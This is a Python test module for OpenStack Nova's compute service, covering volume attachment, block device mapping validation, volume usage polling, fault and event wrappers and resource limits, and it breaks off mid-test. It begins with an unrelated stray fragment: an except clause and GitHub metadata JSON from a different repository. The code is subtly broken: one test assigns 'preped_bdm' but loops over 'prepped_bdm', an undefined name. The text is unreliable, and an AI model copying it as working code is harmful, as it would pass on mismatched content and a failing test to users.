except SQLAlchemyError as e:
print(e); | {
"content_hash": "02c6053ca575dbf41a57561913de212e",
"timestamp": "",
"source": "github",
"line_count": 307,
"max_line_length": 188,
"avg_line_length": 48.32247557003257,
"alnum_prop": 0.45527468823727674,
"repo_name": "dmccloskey/SBaaS_thermodynamics",
"id": "d1dbbb08448bb2d427413c5a19492a3142fe3874",
"size": "14849",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SBaaS_thermodynamics/stage03_quantification_dG_f_query.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "394"
},
{
"name": "Python",
"bytes": "369163"
}
],
"symlink_target": ""
} |
"""Tests for compute service."""
import base64
import contextlib
import copy
import datetime
import operator
import sys
import testtools
import time
import traceback
import uuid
import mock
import mox
from oslo.config import cfg
import nova
from nova import availability_zones
from nova import block_device
from nova import compute
from nova.compute import api as compute_api
from nova.compute import flavors
from nova.compute import manager as compute_manager
from nova.compute import power_state
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.conductor import manager as conductor_manager
from nova import context
from nova import db
from nova import exception
from nova.image import glance
from nova.network import api as network_api
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova.objects import base as obj_base
from nova.objects import instance as instance_obj
from nova.objects import migration as migration_obj
from nova.objects import quotas as quotas_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import rpc
from nova.openstack.common.rpc import common as rpc_common
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import quota
from nova import test
from nova.tests.compute import fake_resource_tracker
from nova.tests.db import fakes as db_fakes
from nova.tests import fake_instance
from nova.tests import fake_instance_actions
from nova.tests import fake_network
from nova.tests import fake_network_cache_model
from nova.tests import fake_notifier
from nova.tests.image import fake as fake_image
from nova.tests import matchers
from nova.tests.objects import test_migration
from nova import utils
from nova.virt import event
from nova.virt import fake
from nova.volume import cinder
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('compute_manager', 'nova.service')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
FAKE_IMAGE_REF = 'fake-image-ref'
NODENAME = 'fakenode1'
def get_primitive_instance_by_uuid(context, instance_uuid):
"""
Helper method to get an instance and then convert it to
a primitive form using jsonutils.
"""
instance = db.instance_get_by_uuid(context, instance_uuid)
return jsonutils.to_primitive(instance)
def unify_instance(instance):
"""Return a dict-like instance for both object-initiated and
model-initiated sources that can reasonably be compared.
"""
newdict = dict()
for k, v in instance.iteritems():
if isinstance(v, datetime.datetime):
# NOTE(danms): DB models and Instance objects have different
# timezone expectations
v = v.replace(tzinfo=None)
elif k == 'fault':
# NOTE(danms): DB models don't have 'fault'
continue
elif k == 'pci_devices':
# NOTE(yonlig.he) pci devices need lazy loading
# fake db does not support it yet.
continue
newdict[k] = v
return newdict
class FakeSchedulerAPI(object):
def run_instance(self, ctxt, request_spec, admin_password,
injected_files, requested_networks, is_first_time,
filter_properties):
pass
def live_migration(self, ctxt, block_migration, disk_over_commit,
instance, dest):
pass
def prep_resize(self, ctxt, instance, instance_type, image, request_spec,
filter_properties, reservations):
pass
class BaseTestCase(test.TestCase):
def setUp(self):
super(BaseTestCase, self).setUp()
self.flags(compute_driver='nova.virt.fake.FakeDriver',
network_manager='nova.network.manager.FlatManager')
fake.set_nodes([NODENAME])
self.flags(use_local=True, group='conductor')
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
self.compute = importutils.import_object(CONF.compute_manager)
# override tracker with a version that doesn't need the database:
fake_rt = fake_resource_tracker.FakeResourceTracker(self.compute.host,
self.compute.driver, NODENAME)
self.compute._resource_tracker_dict[NODENAME] = fake_rt
def fake_get_compute_nodes_in_db(context):
fake_compute_nodes = [{'local_gb': 259,
'vcpus_used': 0,
'deleted': 0,
'hypervisor_type': 'powervm',
'created_at': '2013-04-01T00:27:06.000000',
'local_gb_used': 0,
'updated_at': '2013-04-03T00:35:41.000000',
'hypervisor_hostname': 'fake_phyp1',
'memory_mb_used': 512,
'memory_mb': 131072,
'current_workload': 0,
'vcpus': 16,
'cpu_info': 'ppc64,powervm,3940',
'running_vms': 0,
'free_disk_gb': 259,
'service_id': 7,
'hypervisor_version': 7,
'disk_available_least': 265856,
'deleted_at': None,
'free_ram_mb': 130560,
'id': 2}]
return fake_compute_nodes
def fake_compute_node_delete(context, compute_node):
self.assertEqual(compute_node.get('hypervisor_hostname'),
'fake_phyp1')
self.stubs.Set(self.compute, '_get_compute_nodes_in_db',
fake_get_compute_nodes_in_db)
self.stubs.Set(self.compute.conductor_api, 'compute_node_delete',
fake_compute_node_delete)
self.compute.update_available_resource(
context.get_admin_context())
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id,
self.project_id)
def fake_show(meh, context, id):
if id:
return {'id': id, 'min_disk': None, 'min_ram': None,
'name': 'fake_name',
'status': 'active',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id',
'something_else': 'meow'}}
else:
raise exception.ImageNotFound(image_id=id)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'show', fake_show)
fake_rpcapi = FakeSchedulerAPI()
self.stubs.Set(self.compute, 'scheduler_rpcapi', fake_rpcapi)
fake_network.set_stub_network_methods(self.stubs)
fake_instance_actions.stub_out_action_events(self.stubs)
def fake_get_nw_info(cls, ctxt, instance, *args, **kwargs):
self.assertTrue(ctxt.is_admin)
return fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
self.stubs.Set(network_api.API, 'allocate_for_instance',
fake_get_nw_info)
self.compute_api = compute.API()
# Just to make long lines short
self.rt = self.compute._get_resource_tracker(NODENAME)
def tearDown(self):
timeutils.clear_time_override()
ctxt = context.get_admin_context()
fake_image.FakeImageService_reset()
instances = db.instance_get_all(ctxt)
for instance in instances:
db.instance_destroy(ctxt, instance['uuid'])
fake.restore_nodes()
super(BaseTestCase, self).tearDown()
def _create_fake_instance(self, params=None, type_name='m1.tiny',
services=False):
"""Create a test instance."""
if not params:
params = {}
def make_fake_sys_meta():
sys_meta = params.pop("system_metadata", {})
inst_type = flavors.get_flavor_by_name(type_name)
for key in flavors.system_metadata_flavor_props:
sys_meta['instance_type_%s' % key] = inst_type[key]
return sys_meta
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['task_state'] = None
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
inst['node'] = NODENAME
type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
inst['system_metadata'] = make_fake_sys_meta()
inst['locked'] = False
inst['created_at'] = timeutils.utcnow()
inst['updated_at'] = timeutils.utcnow()
inst['launched_at'] = timeutils.utcnow()
inst['security_groups'] = []
inst.update(params)
if services:
_create_service_entries(self.context.elevated(),
{'fake_zone': [inst['host']]})
return db.instance_create(self.context, inst)
def _objectify(self, db_inst):
return instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), db_inst,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
def _create_fake_instance_obj(self, params=None, type_name='m1.tiny'):
db_inst = self._create_fake_instance(params, type_name=type_name)
return self._objectify(db_inst)
def _create_instance_type(self, params=None):
"""Create a test instance type."""
if not params:
params = {}
context = self.context.elevated()
inst = {}
inst['name'] = 'm1.small'
inst['memory_mb'] = 1024
inst['vcpus'] = 1
inst['root_gb'] = 20
inst['ephemeral_gb'] = 10
inst['flavorid'] = '1'
inst['swap'] = 2048
inst['rxtx_factor'] = 1
inst.update(params)
return db.flavor_create(context, inst)['id']
def _create_group(self):
values = {'name': 'testgroup',
'description': 'testgroup',
'user_id': self.user_id,
'project_id': self.project_id}
return db.security_group_create(self.context, values)
def _stub_migrate_server(self):
def _fake_migrate_server(*args, **kwargs):
pass
self.stubs.Set(conductor_manager.ComputeTaskManager,
'migrate_server', _fake_migrate_server)
class ComputeVolumeTestCase(BaseTestCase):
def setUp(self):
super(ComputeVolumeTestCase, self).setUp()
self.volume_id = 'fake'
self.fetched_attempts = 0
self.instance = {
'id': 'fake',
'uuid': 'fake',
'name': 'fake',
'root_device_name': '/dev/vda',
}
self.stubs.Set(self.compute.volume_api, 'get', lambda *a, **kw:
{'id': self.volume_id})
self.stubs.Set(self.compute.driver, 'get_volume_connector',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'initialize_connection',
lambda *a, **kw: {})
self.stubs.Set(self.compute.volume_api, 'terminate_connection',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'attach',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'detach',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'check_attach',
lambda *a, **kw: None)
def store_cinfo(context, *args):
self.cinfo = jsonutils.loads(args[-1].get('connection_info'))
self.stubs.Set(self.compute.conductor_api,
'block_device_mapping_update',
store_cinfo)
self.stubs.Set(self.compute.conductor_api,
'block_device_mapping_update_or_create',
store_cinfo)
def test_attach_volume_serial(self):
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
instance = self._create_fake_instance()
self.compute.attach_volume(self.context, self.volume_id,
'/dev/vdb', instance)
self.assertEqual(self.cinfo.get('serial'), self.volume_id)
    def test_await_block_device_created_too_slow(self):
def never_get(context, vol_id):
return {
'status': 'creating',
'id': 'blah',
}
self.stubs.Set(self.compute.volume_api, 'get', never_get)
self.assertRaises(exception.VolumeNotCreated,
self.compute._await_block_device_map_created,
self.context, '1', max_tries=2, wait_between=0.1)
def test_await_block_device_created_slow(self):
c = self.compute
def slow_get(context, vol_id):
while self.fetched_attempts < 2:
self.fetched_attempts += 1
return {
'status': 'creating',
'id': 'blah',
}
return {
'status': 'available',
'id': 'blah',
}
self.stubs.Set(c.volume_api, 'get', slow_get)
attempts = c._await_block_device_map_created(self.context, '1',
max_tries=4,
wait_between=0.1)
self.assertEqual(attempts, 3)
def test_boot_volume_serial(self):
block_device_mapping = [
block_device.BlockDeviceDict({
'id': 1,
'no_device': None,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': self.volume_id,
'device_name': '/dev/vdb',
'delete_on_termination': False,
})]
self.compute._prep_block_device(self.context, self.instance,
block_device_mapping)
self.assertEqual(self.cinfo.get('serial'), self.volume_id)
def test_boot_volume_metadata(self, metadata=True):
def volume_api_get(*args, **kwargs):
if metadata:
return {
'volume_image_metadata': {'vol_test_key': 'vol_test_value'}
}
else:
return {}
self.stubs.Set(self.compute_api.volume_api, 'get', volume_api_get)
block_device_mapping = [{
'id': 1,
'device_name': 'vda',
'no_device': None,
'virtual_name': None,
'snapshot_id': None,
'volume_id': self.volume_id,
'delete_on_termination': False,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping)
if metadata:
self.assertEqual(image_meta['vol_test_key'], 'vol_test_value')
else:
self.assertEqual(image_meta, {})
# Test it with new-style BDMs
block_device_mapping = [{
'boot_index': 0,
'source_type': 'volume',
'destination_type': 'volume',
'volume_id': self.volume_id,
'delete_on_termination': False,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping, legacy_bdm=False)
if metadata:
self.assertEqual(image_meta['vol_test_key'], 'vol_test_value')
else:
self.assertEqual(image_meta, {})
def test_boot_volume_no_metadata(self):
self.test_boot_volume_metadata(metadata=False)
def test_boot_image_metadata(self, metadata=True):
def image_api_show(*args, **kwargs):
if metadata:
return {
'properties': {'img_test_key': 'img_test_value'}
}
else:
return {}
self.stubs.Set(self.compute_api.image_service, 'show', image_api_show)
block_device_mapping = [{
'boot_index': 0,
'source_type': 'image',
'destination_type': 'local',
'image_id': "fake-image",
'delete_on_termination': True,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping, legacy_bdm=False)
if metadata:
self.assertEqual(image_meta['img_test_key'], 'img_test_value')
else:
self.assertEqual(image_meta, {})
def test_boot_image_no_metadata(self):
self.test_boot_image_metadata(metadata=False)
def test_poll_volume_usage_disabled(self):
ctxt = 'MockContext'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
# None of the mocks should be called.
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 0
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_interval_not_elapsed(self):
ctxt = 'MockContext'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
self.mox.StubOutWithMock(time, 'time')
# Following methods will be called.
utils.last_completed_audit_period().AndReturn((0, 0))
time.time().AndReturn(10)
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 2
self.compute._last_vol_usage_poll = 9
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_returns_no_vols(self):
ctxt = 'MockContext'
self.compute.host = 'MockHost'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
# Following methods are called.
utils.last_completed_audit_period().AndReturn((0, 0))
self.compute._get_host_volume_bdms(ctxt, 'MockHost').AndReturn([])
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 10
self.compute._last_vol_usage_poll = 0
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_with_data(self):
ctxt = 'MockContext'
self.compute.host = 'MockHost'
curr_time = time.time()
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(self.compute, '_update_volume_usage_cache')
self.stubs.Set(self.compute.driver, 'get_all_volume_usage',
lambda x, y: [3, 4])
# All the mocks are called
utils.last_completed_audit_period().AndReturn((10, 20))
self.compute._get_host_volume_bdms(ctxt, 'MockHost').AndReturn([1, 2])
self.compute._update_volume_usage_cache(ctxt, [3, 4])
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 10
self.compute._last_vol_usage_poll = 0
self.compute._poll_volume_usage(ctxt)
self.assertTrue((curr_time < self.compute._last_vol_usage_poll),
"_last_vol_usage_poll was not properly updated <%s>" %
self.compute._last_vol_usage_poll)
self.mox.UnsetStubs()
def test_detach_volume_usage(self):
        # Test that detach_volume updates the volume usage cache table correctly
instance = self._create_fake_instance()
bdm = {'id': 1,
'device_name': '/dev/vdb',
'connection_info': '{}',
'instance_uuid': instance['uuid'],
'volume_id': 1}
self.mox.StubOutWithMock(self.compute, '_get_instance_volume_bdm')
self.mox.StubOutWithMock(self.compute.driver, 'block_stats')
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
# The following methods will be called
self.compute._get_instance_volume_bdm(self.context, instance, 1).\
AndReturn(bdm)
self.compute.driver.block_stats(instance['name'], 'vdb').\
AndReturn([1L, 30L, 1L, 20L, None])
self.compute._get_host_volume_bdms(self.context, 'fake-mini').\
AndReturn(bdm)
self.compute.driver.get_all_volume_usage(self.context, bdm).\
AndReturn([{'volume': 1,
'rd_req': 1,
'rd_bytes': 10,
'wr_req': 1,
'wr_bytes': 5,
'instance': instance}])
self.mox.ReplayAll()
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
self.compute.attach_volume(self.context, 1, '/dev/vdb', instance)
# Poll volume usage & then detach the volume. This will update the
# total fields in the volume usage cache.
CONF.volume_usage_poll_interval = 10
self.compute._poll_volume_usage(self.context)
# Check that a volume.usage and volume.attach notification was sent
self.assertEqual(2, len(fake_notifier.NOTIFICATIONS))
self.compute.detach_volume(self.context, 1, instance)
# Check that volume.attach, 2 volume.usage, and volume.detach
# notifications were sent
self.assertEquals(4, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals('compute.instance.volume.attach', msg.event_type)
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals('volume.usage', msg.event_type)
payload = msg.payload
self.assertEquals(instance['uuid'], payload['instance_id'])
self.assertEquals('fake', payload['user_id'])
self.assertEquals('fake', payload['tenant_id'])
self.assertEquals(1, payload['reads'])
self.assertEquals(30, payload['read_bytes'])
self.assertEquals(1, payload['writes'])
self.assertEquals(20, payload['write_bytes'])
self.assertEquals(None, payload['availability_zone'])
msg = fake_notifier.NOTIFICATIONS[3]
self.assertEquals('compute.instance.volume.detach', msg.event_type)
        # Check the database for the volume usage record
volume_usages = db.vol_get_usage_by_time(self.context, 0)
self.assertEqual(1, len(volume_usages))
volume_usage = volume_usages[0]
self.assertEqual(0, volume_usage['curr_reads'])
self.assertEqual(0, volume_usage['curr_read_bytes'])
self.assertEqual(0, volume_usage['curr_writes'])
self.assertEqual(0, volume_usage['curr_write_bytes'])
self.assertEqual(1, volume_usage['tot_reads'])
self.assertEqual(30, volume_usage['tot_read_bytes'])
self.assertEqual(1, volume_usage['tot_writes'])
self.assertEqual(20, volume_usage['tot_write_bytes'])
def test_prepare_image_mapping(self):
swap_size = 1
ephemeral_size = 1
instance_type = {'swap': swap_size,
'ephemeral_gb': ephemeral_size}
instance = self._create_fake_instance()
mappings = [
{'virtual': 'ami', 'device': 'sda1'},
{'virtual': 'root', 'device': '/dev/sda1'},
{'virtual': 'swap', 'device': 'sdb4'},
{'virtual': 'ephemeral0', 'device': 'sdc1'},
{'virtual': 'ephemeral1', 'device': 'sdc2'},
]
preped_bdm = self.compute_api._prepare_image_mapping(
instance_type, instance['uuid'], mappings)
expected_result = [
{
'device_name': '/dev/sdb4',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': swap_size
},
{
'device_name': '/dev/sdc1',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': CONF.default_ephemeral_format,
'boot_index': -1,
'volume_size': ephemeral_size
},
{
'device_name': '/dev/sdc2',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': CONF.default_ephemeral_format,
'boot_index': -1,
'volume_size': ephemeral_size
}
]
        for expected, got in zip(expected_result, prepped_bdm):
            self.assertThat(expected, matchers.IsSubDictOf(got))
def test_validate_bdm(self):
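        # Make sure _validate_bdm enforces boot order, the local device
        # limit and the swap/ephemeral size limits.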
def fake_get(self, context, res_id):
return {'id': res_id}
def fake_check_attach(*args, **kwargs):
pass
self.stubs.Set(cinder.API, 'get', fake_get)
self.stubs.Set(cinder.API, 'get_snapshot', fake_get)
self.stubs.Set(cinder.API, 'check_attach',
fake_check_attach)
volume_id = '55555555-aaaa-bbbb-cccc-555555555555'
snapshot_id = '66666666-aaaa-bbbb-cccc-555555555555'
instance = self._create_fake_instance()
instance_type = {'swap': 1, 'ephemeral_gb': 2}
mappings = [
{
'device_name': '/dev/sdb4',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': 1
},
{
'device_name': '/dev/sda1',
'source_type': 'volume',
'destination_type': 'volume',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': 1,
'volume_size': 6
},
{
'device_name': '/dev/sda2',
'source_type': 'snapshot',
'destination_type': 'volume',
'snapshot_id': snapshot_id,
'device_type': 'disk',
'guest_format': None,
'boot_index': 0,
'volume_size': 4
},
{
'device_name': '/dev/sda3',
'source_type': 'image',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': None,
'boot_index': 2,
'volume_size': 1
}
]
# Make sure it passes at first
self.compute_api._validate_bdm(self.context, instance,
instance_type, mappings)
        # Invalid boot sequence (duplicate boot index)
mappings[2]['boot_index'] = 2
self.assertRaises(exception.InvalidBDMBootSequence,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
mappings[2]['boot_index'] = 0
        # Too many local block devices
self.flags(max_local_block_devices=1)
self.assertRaises(exception.InvalidBDMLocalsLimit,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
ephemerals = [
{
'device_name': '/dev/vdb',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': -1,
'volume_size': 1
},
{
'device_name': '/dev/vdc',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': -1,
'volume_size': 1
}]
self.flags(max_local_block_devices=4)
# More ephemerals are OK as long as they are not over the size limit
self.compute_api._validate_bdm(self.context, instance,
instance_type, mappings + ephemerals)
# Ephemerals over the size limit
ephemerals[0]['volume_size'] = 3
self.assertRaises(exception.InvalidBDMEphemeralSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + ephemerals)
self.assertRaises(exception.InvalidBDMEphemeralSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + [ephemerals[0]])
# Swap over the size limit
mappings[0]['volume_size'] = 3
self.assertRaises(exception.InvalidBDMSwapSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
mappings[0]['volume_size'] = 1
additional_swap = [
{
'device_name': '/dev/vdb',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': 1
}]
# More than one swap
self.assertRaises(exception.InvalidBDMFormat,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + additional_swap)
def test_validate_bdm_media_service_exceptions(self):
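        # Make sure _validate_bdm rejects volumes that are not both
        # 'available' and 'detached'.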
instance_type = {'swap': 1, 'ephemeral_gb': 1}
all_mappings = [{'id': 1,
'no_device': None,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': self.volume_id,
'device_name': 'vda',
'boot_index': 0,
'delete_on_termination': False}]
# Check that the volume status is 'available' and reject if not
def fake_volume_get_1(self, context, volume_id):
return {'id': volume_id,
'status': 'creating',
'attach_status': 'detached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_1)
self.assertRaises(exception.InvalidBDMVolume,
self.compute_api._validate_bdm,
self.context, self.instance,
instance_type, all_mappings)
# Check that the volume attach_status is 'detached' and reject if not
def fake_volume_get_2(self, context, volume_id):
return {'id': volume_id,
'status': 'available',
'attach_status': 'attached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_2)
self.assertRaises(exception.InvalidBDMVolume,
self.compute_api._validate_bdm,
self.context, self.instance,
instance_type, all_mappings)
# Check that the volume status is 'available' and attach_status is
# 'detached' and accept the request if so
def fake_volume_get_3(self, context, volume_id):
return {'id': volume_id,
'status': 'available',
'attach_status': 'detached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_3)
self.compute_api._validate_bdm(self.context, self.instance,
instance_type, all_mappings)
def test_volume_snapshot_create(self):
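        # Volume snapshot create is not implemented by the fake driver,
        # so the call should fail.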
self.assertRaises(rpc_common.ClientException,
self.compute.volume_snapshot_create, self.context,
self.instance, 'fake_id', {})
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(NotImplementedError,
self.compute.volume_snapshot_create, self.context,
self.instance, 'fake_id', {})
def test_volume_snapshot_delete(self):
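        # Volume snapshot delete is not implemented by the fake driver,
        # so the call should fail.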
self.assertRaises(rpc_common.ClientException,
self.compute.volume_snapshot_delete, self.context,
self.instance, 'fake_id', 'fake_id2', {})
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(NotImplementedError,
self.compute.volume_snapshot_delete, self.context,
self.instance, 'fake_id', 'fake_id2', {})
class ComputeTestCase(BaseTestCase):
def test_wrap_instance_fault(self):
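        # Ensure wrap_instance_fault records a fault when the wrapped
        # method raises.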
inst = {"uuid": "fake_uuid"}
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance):
raise NotImplementedError()
self.assertRaises(NotImplementedError, failer,
self.compute, self.context, instance=inst)
self.assertTrue(called['fault_added'])
def test_wrap_instance_fault_instance_in_args(self):
inst = {"uuid": "fake_uuid"}
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance):
raise NotImplementedError()
self.assertRaises(NotImplementedError, failer,
self.compute, self.context, inst)
self.assertTrue(called['fault_added'])
def test_wrap_instance_fault_no_instance(self):
inst_uuid = "fake_uuid"
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance_uuid):
raise exception.InstanceNotFound(instance_id=instance_uuid)
self.assertRaises(exception.InstanceNotFound, failer,
self.compute, self.context, inst_uuid)
self.assertFalse(called['fault_added'])
def test_wrap_instance_event(self):
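        # Ensure wrap_instance_event records action event start and
        # finish around the wrapped method.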
inst = {"uuid": "fake_uuid"}
called = {'started': False,
'finished': False}
def did_it_update_start(self2, context, values):
called['started'] = True
def did_it_update_finish(self2, context, values):
called['finished'] = True
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_start', did_it_update_start)
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_finish', did_it_update_finish)
@compute_manager.wrap_instance_event
def fake_event(self, context, instance):
pass
fake_event(self.compute, self.context, instance=inst)
self.assertTrue(called['started'])
self.assertTrue(called['finished'])
def test_wrap_instance_event_log_exception(self):
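        # Ensure the action event finish record carries the exception
        # message when the wrapped method raises.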
inst = {"uuid": "fake_uuid"}
called = {'started': False,
'finished': False,
'message': ''}
def did_it_update_start(self2, context, values):
called['started'] = True
def did_it_update_finish(self2, context, values):
called['finished'] = True
called['message'] = values['message']
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_start', did_it_update_start)
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_finish', did_it_update_finish)
@compute_manager.wrap_instance_event
def fake_event(self2, context, instance):
raise exception.NovaException()
self.assertRaises(exception.NovaException, fake_event,
self.compute, self.context, instance=inst)
self.assertTrue(called['started'])
self.assertTrue(called['finished'])
self.assertEqual('An unknown exception occurred.', called['message'])
def test_object_compat(self):
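        # Ensure object_compat converts a dict instance argument into an
        # Instance object.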
db_inst = fake_instance.fake_db_instance()
@compute_manager.object_compat
def test_fn(_self, context, instance):
self.assertIsInstance(instance, instance_obj.Instance)
self.assertEqual(instance.uuid, db_inst['uuid'])
test_fn(None, self.context, instance=db_inst)
def test_create_instance_with_img_ref_associates_config_drive(self):
# Make sure create associates a config drive.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'config_drive': '1234', }))
try:
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertTrue(instance['config_drive'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_create_instance_associates_config_drive(self):
# Make sure create associates a config drive.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'config_drive': '1234', }))
try:
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertTrue(instance['config_drive'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_create_instance_unlimited_memory(self):
# Default of memory limit=None is unlimited.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
params = {"memory_mb": 999999999999}
filter_properties = {'limits': {'memory_mb': None}}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(999999999999, self.rt.compute_node['memory_mb_used'])
def test_create_instance_unlimited_disk(self):
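        # Default of disk limit=None is unlimited.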
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
params = {"root_gb": 999999999999,
"ephemeral_gb": 99999999999}
filter_properties = {'limits': {'disk_gb': None}}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
def test_create_multiple_instances_then_starve(self):
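        # Claims should succeed until the memory and disk limits are
        # exhausted, then fail.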
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
filter_properties = {'limits': {'memory_mb': 4096, 'disk_gb': 1000}}
params = {"memory_mb": 1024, "root_gb": 128, "ephemeral_gb": 128}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
        self.assertEqual(1024, self.rt.compute_node['memory_mb_used'])
        self.assertEqual(256, self.rt.compute_node['local_gb_used'])
params = {"memory_mb": 2048, "root_gb": 256, "ephemeral_gb": 256}
instance = self._create_fake_instance(params)
